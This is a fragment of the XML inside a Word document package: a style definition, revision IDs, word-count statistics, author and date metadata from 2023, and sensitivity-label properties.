    <w:rsid w:val="00A5684D"/>
    <w:rsid w:val="00AD1A41"/>
    <w:rsid w:val="00C56191"/>
    <w:rsid w:val="00CC5380"/>
    <w:rsid w:val="00D30D80"/>
    <w:rsid w:val="00ED49FB"/>
    <w:rsid w:val="00F05262"/>
    <w:rsid w:val="00F62855"/>
    <w:rsid w:val="00FA0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A33E2E5AEE4B5391A2415A29E1861A">
    <w:name w:val="57A33E2E5AEE4B5391A2415A29E1861A"/>
    <w:rsid w:val="00D30D80"/>
  </w:style>
  <w:style w:type="character" w:styleId="Testosegnaposto">
    <w:name w:val="Placeholder Text"/>
    <w:basedOn w:val="Carpredefinitoparagrafo"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00F62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A1F31A-2E35-45EB-AFD2-45397C103853}">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A0F5-AC9E-4131-A08F-201E91C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10184</Words>
  <Characters>60701</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>1597</Lines>
  <Paragraphs>8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ATEO</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>MAURO GALATEO</cp:lastModifiedBy>
  <cp:revision>5</cp:revision>
  <cp:lastPrinted>2023-07-13T16:34:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-07-13T16:20:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-07-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3-23T22:50:2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d56c0cfe-d215-46cb-ae70-d387b455d885</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="8" name="MSIP_Label_2ad0b24d-6422-44b0-b3de-abb3a9e8c81a_ContentBits">
    <vt:lpwstr>0</vt:lpwstr>
  </property>
</Properties>
</file>